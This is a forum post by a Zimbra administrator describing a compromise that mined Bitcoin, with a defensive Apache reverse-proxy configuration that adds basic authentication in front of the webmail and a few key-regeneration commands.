I'm not advocating not patching, but the following will work. I'm going with my default position of not trusting authentication mechanisms of hosted apps, so I set up an HTTP proxy with authentication. HTTP/HTTPS and 7071 (admin port) are closed, and only available through the proxy. The best candidate server I had runs Apache, so I made it in Apache:if you have a vulnerable zimbra installation you're vulnerable, you cannot add mitigation (probably only a WAF could do something).
Code: Select all
<VirtualHost *:80>
RewriteEngine on
RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R]
ServerName webmail.example.net
</VirtualHost>
<VirtualHost *:443>
ServerName webmail.example.net
ServerAdmin webmaster@localhost
SSLEngine on
SSLCertificateFile /etc/letsencrypt/live/webmail.example.net/cert.pem
SSLCertificateKeyFile /etc/letsencrypt/live/webmail.example.net/privkey.pem
SSLCertificateChainFile /etc/letsencrypt/live/webmail.example.net/chain.pem
SSLProxyEngine On
ProxyPass / https://mail.example.net/
ProxyPassReverse / https://mail.example.net/
<Location /dav>
Satisfy any
Require all granted
</Location>
<Location /.well-known/>
Satisfy any
Require all granted
</Location>
<Location /principals/>
Satisfy any
Require all granted
</Location>
<Location /SOGo/>
Satisfy any
Require all granted
</Location>
<Location /groupdav.php>
Satisfy any
Require all granted
</Location>
<Location />
AuthType Basic
AuthName "Foobar"
AuthUserFile /etc/apache2/htpasswd/webmail
Require valid-user
</Location>
ErrorLog ${APACHE_LOG_DIR}/webmail.example.net/error.log
CustomLog ${APACHE_LOG_DIR}/webmail.example.net/access.log combined
</VirtualHost>
BTW: one should also run:
Code: Select all
su - zimbra
zmsshkeygen
zmupdateauthkeys
All in all, I can't shake how polite this hack is. It's almost a smoke screen. With the zimbra user, you have access to everything, potentially: install authorized_keys, crontabs in spools, upload all mail from the server. You can even falsify the access logs, because they're also owned by zimbra. Yet all that is done is mine Bitcoin? A severely inefficient process (1000 servers is about one ASIC miner). And, the access logs on my server started seeing these POSTs march 28, and it was only yesterday that the mining started...
Because of a daily backup of dumped accounts, I see a very steady rhythm of network traffic. There is no extra peak, so it appears my entire e-mail archive wasn't downloaded. But, they could have...
Next up, find out why the update notifier doesn't work. '/opt/zimbra/libexec/zmcheckversion -c' is called by cron, but just says 'Too early' when I run it from the command line.